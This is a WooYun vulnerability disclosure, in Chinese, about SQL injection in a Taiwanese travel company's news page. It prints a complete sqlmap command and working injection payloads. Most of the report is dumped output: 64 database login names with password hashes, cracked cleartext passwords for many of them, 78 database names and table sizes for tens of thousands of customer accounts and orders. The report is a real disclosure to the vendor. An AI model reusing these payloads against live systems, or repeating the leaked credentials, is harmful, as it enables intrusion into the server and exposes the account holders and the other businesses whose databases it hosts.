当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153332

漏洞标题:前方旅遊某站存在SQL插入攻擊(DBA權限;64名系統管理員密碼泄露;78個庫;數萬條賬戶信息泄露)(臺灣地區)

相关厂商:前方旅遊

漏洞作者: 路人甲

提交时间:2015-11-10 16:02

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

前方旅遊某站存在SQL插入攻擊(DBA權限;64名系統管理員密碼泄露;78個庫;數萬條賬戶信息泄露)

详细说明:

地址:http://**.**.**.**/About_NewsContent.aspx?ReqID=273

python sqlmap.py -u "http://**.**.**.**/About_NewsContent.aspx?ReqID=273" -p ReqID --technique=BE --random-agent --batch -D 'Travel' --count

漏洞证明:

---
Parameter: ReqID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ReqID=273 AND 9136=9136
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ReqID=273 AND 8890=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8890=8890) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(118)+CHAR(113)))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current user:    'Allen_Travel'
current user is DBA:    True
database management system users [64]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] 3feng
[*] adminabc
[*] Agriculture
[*] Ait
[*] AitCC
[*] Allen_Travel
[*] appdbuser
[*] Assets
[*] Blues
[*] bryant
[*] chanquare
[*] cookystech
[*] coolhappy
[*] CouponKing
[*] D-Life
[*] D-Life-M1
[*] D-Life-M2
[*] Dachangmusic
[*] DB89950935
[*] Digital-Life-M3
[*] distributor_admin
[*] dosbox
[*] e-learning_moodle
[*] fda
[*] forgicon
[*] Geoton
[*] gms
[*] GoodMd
[*] GreatFame
[*] herbian
[*] Homelife
[*] Investex
[*] investuser
[*] james
[*] jimmy
[*] Jimmy_user
[*] joyce
[*] Ken
[*] kscg1000
[*] lav1147
[*] lwh_comic
[*] Marvelot
[*] MIRDC
[*] modou
[*] nightmarket
[*] onlineopen168
[*] Open-168-M1
[*] Open-168_WebSide
[*] Panbiotic
[*] phpc
[*] richard
[*] sa
[*] SamWang
[*] seafood
[*] shopmix
[*] smecluster
[*] STUDTGD
[*] sunet
[*] super-leader
[*] test
[*] tim
[*] YCHTW
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x0100a339c093cddf8ee6eba1f481d48a3bbf1c9bc81eaaa5610b
        header: 0x0100
        salt: a339c093
        mixedcase: cddf8ee6eba1f481d48a3bbf1c9bc81eaaa5610b
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01006df48f0931fdf12f6fe276cd0c7606321f54d03a58b67d9f
        header: 0x0100
        salt: 6df48f09
        mixedcase: 31fdf12f6fe276cd0c7606321f54d03a58b67d9f
[*] 3feng [1]:
    password hash: 0x010052d4611fa154178b6ea1ef9632233b58b4e624a186e34785
        header: 0x0100
        salt: 52d4611f
        mixedcase: a154178b6ea1ef9632233b58b4e624a186e34785
    clear-text password: 3feng
[*] adminabc [1]:
    password hash: 0x01007e4812c88e5f0216a9036ad3df5f4a03d132b8e7390a7ce9
        header: 0x0100
        salt: 7e4812c8
        mixedcase: 8e5f0216a9036ad3df5f4a03d132b8e7390a7ce9
    clear-text password: 123456
[*] Agriculture [1]:
    password hash: 0x0100e0a9ef706fbc27b8b2db48acc9e5a93e9dea1ae7d64cefeb
        header: 0x0100
        salt: e0a9ef70
        mixedcase: 6fbc27b8b2db48acc9e5a93e9dea1ae7d64cefeb
[*] Ait [1]:
    password hash: 0x010040843dd9eab4f248105bbb13530034dfceeaf1e6bed01a55
        header: 0x0100
        salt: 40843dd9
        mixedcase: eab4f248105bbb13530034dfceeaf1e6bed01a55
[*] AitCC [1]:
    password hash: 0x01008340f8d473733d604bae5dc9e41be5301ad33811fadf5692
        header: 0x0100
        salt: 8340f8d4
        mixedcase: 73733d604bae5dc9e41be5301ad33811fadf5692
[*] Allen_Travel [1]:
    password hash: 0x01002f20879599971a40bd09b94cb24ca63fc1ff70050e101821
        header: 0x0100
        salt: 2f208795
        mixedcase: 99971a40bd09b94cb24ca63fc1ff70050e101821
[*] appdbuser [1]:
    password hash: 0x0100c46f24f81f31a0e153d7bccfde3e32a16316666e9adf18fd
        header: 0x0100
        salt: c46f24f8
        mixedcase: 1f31a0e153d7bccfde3e32a16316666e9adf18fd
[*] Assets [1]:
    password hash: 0x0100071c1dcef26dce3951d188b29be28be811ac0c12aed83219
        header: 0x0100
        salt: 071c1dce
        mixedcase: f26dce3951d188b29be28be811ac0c12aed83219
[*] Blues [1]:
    password hash: 0x01002817532b8dde298c59420ca2cc2ca00681290123cbe62b6c
        header: 0x0100
        salt: 2817532b
        mixedcase: 8dde298c59420ca2cc2ca00681290123cbe62b6c
[*] bryant [1]:
    password hash: 0x010083e01a778bd5f6f372fe10d3c97c7c8c4fabd6c2ddbc734b
        header: 0x0100
        salt: 83e01a77
        mixedcase: 8bd5f6f372fe10d3c97c7c8c4fabd6c2ddbc734b
    clear-text password: bryant
[*] chanquare [1]:
    password hash: 0x010055134ff15328d307e05f82a98c8875cd6f1f22b34e7039c4
        header: 0x0100
        salt: 55134ff1
        mixedcase: 5328d307e05f82a98c8875cd6f1f22b34e7039c4
[*] cookystech [1]:
    password hash: 0x0100b6fff9efa63bbef8fbcb363af9aafbe9ba8aed682136d140
        header: 0x0100
        salt: b6fff9ef
        mixedcase: a63bbef8fbcb363af9aafbe9ba8aed682136d140
    clear-text password: 123456
[*] coolhappy [1]:
    password hash: 0x0100af87a53ba541115a98d8cc0bb9dad837652e937e9ccf7c9f
        header: 0x0100
        salt: af87a53b
        mixedcase: a541115a98d8cc0bb9dad837652e937e9ccf7c9f
[*] CouponKing [1]:
    password hash: 0x0100eb793083898a24b15177f0d21a30bbec457c6c5c75e63386
        header: 0x0100
        salt: eb793083
        mixedcase: 898a24b15177f0d21a30bbec457c6c5c75e63386
[*] D-Life [1]:
    password hash: 0x0100edc9aa7655c1d251645e65991f4926dc3fae6854eb556448
        header: 0x0100
        salt: edc9aa76
        mixedcase: 55c1d251645e65991f4926dc3fae6854eb556448
[*] D-Life-M1 [1]:
    password hash: 0x0100cc208f349498ff9a38b47612681c32945e1c406907c72d94
        header: 0x0100
        salt: cc208f34
        mixedcase: 9498ff9a38b47612681c32945e1c406907c72d94
[*] D-Life-M2 [1]:
    password hash: 0x0100c4aa4f5c996ca6d33dea03b3e231fe91032df506db619dec
        header: 0x0100
        salt: c4aa4f5c
        mixedcase: 996ca6d33dea03b3e231fe91032df506db619dec
[*] Dachangmusic [1]:
    password hash: 0x010014f957c8b6b14f3c35ffb1f7164bd132c3bb3767950047de
        header: 0x0100
        salt: 14f957c8
        mixedcase: b6b14f3c35ffb1f7164bd132c3bb3767950047de
[*] DB89950935 [1]:
    password hash: 0x0100223768cde425f12dac972b6a3a577332381384330a5863fb
        header: 0x0100
        salt: 223768cd
        mixedcase: e425f12dac972b6a3a577332381384330a5863fb
[*] Digital-Life-M3 [1]:
    password hash: 0x01007e23503ac2650b80ef1cb662d8db8ff9e089564d56b5a5ef
        header: 0x0100
        salt: 7e23503a
        mixedcase: c2650b80ef1cb662d8db8ff9e089564d56b5a5ef
[*] distributor_admin [1]:
    password hash: 0x0100a7ba88355fe95f6e835aea340ef154c25055ac6a4445f33c
        header: 0x0100
        salt: a7ba8835
        mixedcase: 5fe95f6e835aea340ef154c25055ac6a4445f33c
[*] dosbox [1]:
    password hash: 0x0100610e50f1f3df49459da6f12198a36774d704caff0d87a682
        header: 0x0100
        salt: 610e50f1
        mixedcase: f3df49459da6f12198a36774d704caff0d87a682
[*] e-learning_moodle [1]:
    password hash: 0x0100d9e3b6cd85dbe45b3cdcc002f44f788f362d0a6fe1fbf259
        header: 0x0100
        salt: d9e3b6cd
        mixedcase: 85dbe45b3cdcc002f44f788f362d0a6fe1fbf259
[*] fda [1]:
    password hash: 0x0100fc0b8fe98f00a19974db220331b6736c8a0746af75fef57d
        header: 0x0100
        salt: fc0b8fe9
        mixedcase: 8f00a19974db220331b6736c8a0746af75fef57d
    clear-text password: fda
[*] forgicon [1]:
    password hash: 0x010039f9f5c690c1e2c334889f44d80df8ce9f471294db7c1650
        header: 0x0100
        salt: 39f9f5c6
        mixedcase: 90c1e2c334889f44d80df8ce9f471294db7c1650
    clear-text password: forgicon
[*] Geoton [1]:
    password hash: 0x0100366a3fc785de6be4e28ae0d8932700a1c7e0f74c3f9accba
        header: 0x0100
        salt: 366a3fc7
        mixedcase: 85de6be4e28ae0d8932700a1c7e0f74c3f9accba
    clear-text password: Geoton
[*] gms [1]:
    password hash: 0x01004e85abd4f46d1351a25a5b7a4abd2a48cd073db2419eb3ec
        header: 0x0100
        salt: 4e85abd4
        mixedcase: f46d1351a25a5b7a4abd2a48cd073db2419eb3ec
    clear-text password: 0000
[*] GoodMd [1]:
    password hash: 0x010091a4b2d8e5697203954c2f199b040dcf6e0e2d2e40fd3594
        header: 0x0100
        salt: 91a4b2d8
        mixedcase: e5697203954c2f199b040dcf6e0e2d2e40fd3594
    clear-text password: GoodMd
[*] GreatFame [1]:
    password hash: 0x0100d4fbfd992b6b122246c06a19950bb157f3ae584db8876201
        header: 0x0100
        salt: d4fbfd99
        mixedcase: 2b6b122246c06a19950bb157f3ae584db8876201
[*] herbian [1]:
    password hash: 0x01009c5bc65d6d9ffe02a9522e7c52978e487c6a1efb45721449
        header: 0x0100
        salt: 9c5bc65d
        mixedcase: 6d9ffe02a9522e7c52978e487c6a1efb45721449
[*] Homelife [1]:
    password hash: 0x01002bc7c0736f98e7f61d1c8a7a9593155791ee33ee93220b15
        header: 0x0100
        salt: 2bc7c073
        mixedcase: 6f98e7f61d1c8a7a9593155791ee33ee93220b15
[*] Investex [1]:
    password hash: 0x0100e39e62e40b27795ecd1494a5f0a3af2a59c0438cf6956e1f
        header: 0x0100
        salt: e39e62e4
        mixedcase: 0b27795ecd1494a5f0a3af2a59c0438cf6956e1f
[*] investuser [1]:
    password hash: 0x010095da3829c6507d757f6769503e623a6ff3b20d50c6256612
        header: 0x0100
        salt: 95da3829
        mixedcase: c6507d757f6769503e623a6ff3b20d50c6256612
    clear-text password: p123456
[*] james [1]:
    password hash: 0x0100333897825a99936be01349eb0d4af5579cedf88f8b788576
        header: 0x0100
        salt: 33389782
        mixedcase: 5a99936be01349eb0d4af5579cedf88f8b788576
    clear-text password: james
[*] jimmy [1]:
    password hash: 0x01009cd62ea0282205f63ce36146675b5ad1c8e9c665da63b6fc
        header: 0x0100
        salt: 9cd62ea0
        mixedcase: 282205f63ce36146675b5ad1c8e9c665da63b6fc
    clear-text password: jimmy
[*] Jimmy_user [1]:
    password hash: 0x0100e0cde2e32554d58ca8479e842bfa509ff0911135e22dee1c
        header: 0x0100
        salt: e0cde2e3
        mixedcase: 2554d58ca8479e842bfa509ff0911135e22dee1c
    clear-text password: 54321
[*] joyce [1]:
    password hash: 0x01006f6d23882802abd6da9c367e2fbc793a957b2b18182eb0a6
        header: 0x0100
        salt: 6f6d2388
        mixedcase: 2802abd6da9c367e2fbc793a957b2b18182eb0a6
    clear-text password: 123456
[*] Ken [1]:
    password hash: 0x01008a936187088806336f47bba80c528fb465f6b412e035018a
        header: 0x0100
        salt: 8a936187
        mixedcase: 088806336f47bba80c528fb465f6b412e035018a
    clear-text password: ken
[*] kscg1000 [1]:
    password hash: 0x010071cf1d47f2a19427e1d4874e461b6e402a8c045eefb8d507
        header: 0x0100
        salt: 71cf1d47
        mixedcase: f2a19427e1d4874e461b6e402a8c045eefb8d507
[*] lav1147 [1]:
    password hash: 0x01001703ba81df2726bd9e3cf4161d74f99b10cb5949693af80a
        header: 0x0100
        salt: 1703ba81
        mixedcase: df2726bd9e3cf4161d74f99b10cb5949693af80a
[*] lwh_comic [1]:
    password hash: 0x010097d854769860468ec9c428148698bbad34cd903b3f52bcc1
        header: 0x0100
        salt: 97d85476
        mixedcase: 9860468ec9c428148698bbad34cd903b3f52bcc1
    clear-text password: lwh_comic
[*] Marvelot [1]:
    password hash: 0x0100d3c05b4087bb7630763e85949eec816cec3e5ce63fe2587d
        header: 0x0100
        salt: d3c05b40
        mixedcase: 87bb7630763e85949eec816cec3e5ce63fe2587d
    clear-text password: Marvelot
[*] MIRDC [1]:
    password hash: 0x010033b813c3d0a1978f2bf74e2a985b1180e9a60e814ae6117c
        header: 0x0100
        salt: 33b813c3
        mixedcase: d0a1978f2bf74e2a985b1180e9a60e814ae6117c
[*] modou [1]:
    password hash: 0x010015567a42ba2e5f06a42ccac9bd575dc90cc56beecf24d913
        header: 0x0100
        salt: 15567a42
        mixedcase: ba2e5f06a42ccac9bd575dc90cc56beecf24d913
    clear-text password: daijiro
[*] nightmarket [1]:
    password hash: 0x01009071a058d7ebf207f4a44840f9634933536fda3a6fe55cf9
        header: 0x0100
        salt: 9071a058
        mixedcase: d7ebf207f4a44840f9634933536fda3a6fe55cf9
[*] onlineopen168 [1]:
    password hash: 0x01000b466761ffed43095ac52021436344dc84e761d26ff30d28
        header: 0x0100
        salt: 0b466761
        mixedcase: ffed43095ac52021436344dc84e761d26ff30d28
[*] Open-168-M1 [1]:
    password hash: 0x01003e5a381d91274b91cc54a065069dcf91af3bfbdf8c9ec7a2
        header: 0x0100
        salt: 3e5a381d
        mixedcase: 91274b91cc54a065069dcf91af3bfbdf8c9ec7a2
[*] Open-168_WebSide [1]:
    password hash: 0x01000706ad5503b3d28fde3704adf3bbe236d46373fa898388c0
        header: 0x0100
        salt: 0706ad55
        mixedcase: 03b3d28fde3704adf3bbe236d46373fa898388c0
    clear-text password: Open-168_WebSide
[*] Panbiotic [1]:
    password hash: 0x01003a15f0b32d7cacd0df4bd02ef908613aa8a9d02e0357aad4
        header: 0x0100
        salt: 3a15f0b3
        mixedcase: 2d7cacd0df4bd02ef908613aa8a9d02e0357aad4
[*] phpc [1]:
    password hash: 0x0100dad76db927a55e13a4f69e7379daf8cf3e30adc60906fcb3
        header: 0x0100
        salt: dad76db9
        mixedcase: 27a55e13a4f69e7379daf8cf3e30adc60906fcb3
[*] richard [1]:
    password hash: 0x01008b2ad014c83129cf7da1c63146f01adb4ce2721ca3fa2972
        header: 0x0100
        salt: 8b2ad014
        mixedcase: c83129cf7da1c63146f01adb4ce2721ca3fa2972
[*] sa [1]:
    password hash: 0x010056049b0e7bbd0850e4d74ed8d769912970acdd349c3613aa
        header: 0x0100
        salt: 56049b0e
        mixedcase: 7bbd0850e4d74ed8d769912970acdd349c3613aa
[*] SamWang [1]:
    password hash: 0x0100037306a82a15838b81a341746d3622bd40e12a2624491c73
        header: 0x0100
        salt: 037306a8
        mixedcase: 2a15838b81a341746d3622bd40e12a2624491c73
[*] seafood [1]:
    password hash: 0x010038e2a73e78058e203c9b1b96e6863c5c57b428a55d2b2c4d
        header: 0x0100
        salt: 38e2a73e
        mixedcase: 78058e203c9b1b96e6863c5c57b428a55d2b2c4d
[*] shopmix [1]:
    password hash: 0x010023e4f6f8956f7772930afa1c4b06c22fc0b416f742f0859f
        header: 0x0100
        salt: 23e4f6f8
        mixedcase: 956f7772930afa1c4b06c22fc0b416f742f0859f
[*] smecluster [1]:
    password hash: 0x01003d9d246bb813ee3b040a9a17cc32f83ca29215b26f194f16
        header: 0x0100
        salt: 3d9d246b
        mixedcase: b813ee3b040a9a17cc32f83ca29215b26f194f16
[*] STUDTGD [1]:
    password hash: 0x010000681acd4d04a37584832eaad31f3d25a7cdaa9c9e41d362
        header: 0x0100
        salt: 00681acd
        mixedcase: 4d04a37584832eaad31f3d25a7cdaa9c9e41d362
[*] sunet [1]:
    password hash: 0x0100dfa22c3f7e4adef80cfdf1308cfbc7cb70b2464ee8ea508e
        header: 0x0100
        salt: dfa22c3f
        mixedcase: 7e4adef80cfdf1308cfbc7cb70b2464ee8ea508e
[*] super-leader [1]:
    password hash: 0x010040bc0e34a37b015917e29c27b9ff3b2b69e47a8a9e90945c
        header: 0x0100
        salt: 40bc0e34
        mixedcase: a37b015917e29c27b9ff3b2b69e47a8a9e90945c
[*] test [1]:
    password hash: 0x01002617c7eb974346a9c964b47fd23660a52e7c9bca128da4fd
        header: 0x0100
        salt: 2617c7eb
        mixedcase: 974346a9c964b47fd23660a52e7c9bca128da4fd
    clear-text password: test
[*] tim [1]:
    password hash: 0x0100e9d5de9f68256b9989c601cba838f351cd12928e82f57ab0
        header: 0x0100
        salt: e9d5de9f
        mixedcase: 68256b9989c601cba838f351cd12928e82f57ab0
    clear-text password: just
[*] YCHTW [1]:
    password hash: 0x01007290d504acc41072a668a7c26538479cc2c957435489fc80
        header: 0x0100
        salt: 7290d504
        mixedcase: acc41072a668a7c26538479cc2c957435489fc80


available databases [78]:
[*] 3feng
[*] AITCreditCenter
[*] apppos365
[*] assets
[*] bigcity
[*] cookysteach
[*] cookysteach2
[*] coolhappy_demo
[*] Coupon-King
[*] Coupon-King-Simple
[*] CouponKingTemp
[*] CreditCenter
[*] DachangMusic
[*] DB08940
[*] Digital-Life-M1
[*] Digital-Life-M2
[*] Digital-Life-M3
[*] Digital-Life-M3_Jimmy
[*] DIgital-Life-Shop
[*] distribution
[*] e-mlh
[*] EnjoyYoung
[*] FDA
[*] FHPOS
[*] game01
[*] Geoton
[*] Greatfame
[*] GreatFame_e-learning
[*] GreatFame_e-learning_Jimmy
[*] Greatfame_Jimmy
[*] GreatFame_moodle
[*] GreatfameTest
[*] herbian
[*] HomeLife
[*] Invest2010
[*] Investex
[*] jetcom
[*] jetcom_jimmy
[*] kscg1000
[*] kscg1000_3
[*] kscg1000_4
[*] LWH
[*] lwh_comic
[*] Marvelot
[*] master
[*] mix-2
[*] Mix-III
[*] MIX-III_OutSourcing
[*] MIX_NET
[*] model
[*] msdb
[*] MyCityShop
[*] Naisenkelin
[*] Naisenkelin_Test
[*] new_open168
[*] night_market
[*] Nightmarket2
[*] OnlineOpen
[*] open168_leader
[*] open168_leader_M2
[*] Panbiotic
[*] pos_nightmarket
[*] ReportServer
[*] ReportServerTempDB
[*] shute-shadow
[*] smecluster
[*] sunet-M2
[*] sunet-M3
[*] Temp
[*] tempdb
[*] testopen168III
[*] Travel
[*] Travel_develop
[*] Travel_new
[*] TSAIching
[*] WebPageMarketingClass
[*] YCHtw
[*] YCHTWBak


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: Travel
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.Order2                     | 45693   |
| dbo.syncobj_0x3846453338434136 | 45693   |
| dbo.Account                    | 24026   |
| dbo.syncobj_0x3230443741444135 | 24026   |
| dbo.AR                         | 23713   |
| dbo.syncobj_0x3943363837414541 | 23713   |
| dbo.Order1                     | 23267   |
| dbo.syncobj_0x3244303138384632 | 23267   |
| dbo.syncobj_0x4134333630313135 | 17564   |
| dbo.Vip                        | 17564   |
| dbo.Order3                     | 2454    |
| dbo.syncobj_0x4245423343344144 | 2454    |
| dbo.DiscussReply               | 1822    |
| dbo.syncobj_0x4138303335434636 | 1822    |
| dbo.syncobj_0x3038354637464534 | 1629    |
| dbo.VipData                    | 1629    |
| dbo.RemittanceNotice           | 1274    |
| dbo.syncobj_0x3942384542364443 | 1274    |
| dbo.syncobj_0x3831364133463843 | 1070    |
| dbo.Upfiles                    | 1070    |
| dbo.syncobj_0x3436303845454633 | 1022    |
| dbo.VIPCRM                     | 1022    |
| dbo.Shipping                   | 970     |
| dbo.syncobj_0x4630413642414535 | 970     |
| dbo.Air_OrderDetail            | 778     |
| dbo.syncobj_0x4335393530313631 | 778     |
| dbo.Air_OrderCondition         | 774     |
| dbo.syncobj_0x3430463435324344 | 774     |
| dbo.DiscussTitle               | 769     |
| dbo.syncobj_0x4443363034424434 | 769     |
| dbo.Procurement2               | 669     |
| dbo.syncobj_0x3839413336464637 | 669     |
| dbo.ShipCancel                 | 643     |
| dbo.syncobj_0x3343303839463143 | 643     |
| dbo.sysarticlecolumns          | 602     |
| dbo.Air_OrderPax               | 470     |
| dbo.syncobj_0x4431423131353735 | 470     |
| dbo.Air_OrderPnrCodeLog        | 457     |
| dbo.syncobj_0x3134383044374142 | 457     |
| dbo.Stock                      | 432     |
| dbo.syncobj_0x4338324431323333 | 432     |
| dbo.Product2                   | 386     |
| dbo.syncobj_0x3935463741384133 | 386     |
| dbo.Air_Order                  | 383     |
| dbo.syncobj_0x3444393841463239 | 383     |
| dbo.Procurement1               | 274     |
| dbo.syncobj_0x3835323642413636 | 274     |
| dbo.About                      | 237     |
| dbo.syncobj_0x3245324538363244 | 237     |
| dbo.AP                         | 206     |
| dbo.syncobj_0x4332423739344444 | 206     |
| dbo.ShipMain                   | 146     |
| dbo.syncobj_0x4438443935433134 | 146     |
| dbo.syssubscriptions           | 124     |
| dbo.SlideImages                | 108     |
| dbo.syncobj_0x4337373046303031 | 108     |
| dbo.syncobj_0x3434413639444131 | 68      |
| dbo.Transfer_Account           | 68      |
| dbo.StockMain                  | 66      |
| dbo.syncobj_0x3035394136414330 | 66      |
| dbo.APSub                      | 64      |
| dbo.syncobj_0x4631304646453242 | 64      |
| dbo.sysarticles                | 62      |
| dbo.sysextendedarticlesview    | 62      |
| dbo.Product1                   | 47      |
| dbo.syncobj_0x3243304343374232 | 47      |
| dbo.OtherPay                   | 43      |
| dbo.syncobj_0x4137424342343745 | 43      |
| dbo.Supplier                   | 26      |
| dbo.syncobj_0x3031414131393542 | 26      |
| dbo.City                       | 23      |
| dbo.syncobj_0x4230424432434333 | 23      |
| dbo.Occupation                 | 22      |
| dbo.syncobj_0x4444454631423633 | 22      |
| dbo.Marquee                    | 15      |
| dbo.syncobj_0x3037344437354135 | 15      |
| dbo.Bank                       | 12      |
| dbo.Prepaid                    | 12      |
| dbo.syncobj_0x3533453135363134 | 12      |
| dbo.syncobj_0x3833343833433144 | 12      |
| dbo.Admin                      | 11      |
| dbo.ProcessGroup2              | 11      |
| dbo.syncobj_0x4242464133413534 | 11      |
| dbo.syncobj_0x4531413239333245 | 11      |
| dbo.Dismantling                | 10      |
| dbo.syncobj_0x4241323033333843 | 10      |
| dbo.FTransport                 | 9       |
| dbo.Process                    | 9       |
| dbo.syncobj_0x3739344641323242 | 9       |
| dbo.syncobj_0x4233314330443338 | 9       |
| dbo.EDU                        | 7       |
| dbo.syncobj_0x4138393536393036 | 7       |
| dbo.Combination                | 6       |
| dbo.Country                    | 6       |
| dbo.PDType                     | 6       |
| dbo.ShipReture                 | 6       |
| dbo.syncobj_0x3231423143394244 | 6       |
| dbo.syncobj_0x3335374138464336 | 6       |
| dbo.syncobj_0x4239454635353836 | 6       |
| dbo.syncobj_0x4241434131304232 | 6       |
| dbo.BTransport                 | 5       |
| dbo.Contact                    | 5       |
| dbo.RightAD                    | 5       |
| dbo.syncobj_0x3239314441384333 | 5       |
| dbo.syncobj_0x4442443645324442 | 5       |
| dbo.syncobj_0x4533393632413344 | 5       |
| dbo.AdminFunction              | 4       |
| dbo.syncobj_0x4443364638344635 | 4       |
| dbo.ProcessGroup               | 3       |
| dbo.syncobj_0x3531314544354134 | 3       |
| dbo.ProcReture                 | 2       |
| dbo.RetureMain                 | 2       |
| dbo.syncobj_0x3441363041414230 | 2       |
| dbo.syncobj_0x3942394535344539 | 2       |
| dbo.ProcCancel                 | 1       |
| dbo.syncobj_0x4131433636364646 | 1       |
| dbo.syspublications            | 1       |
| dbo.sysreplservers             | 1       |
+--------------------------------+---------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-23 00:43

厂商回复:

感謝通報

最新状态:

暂无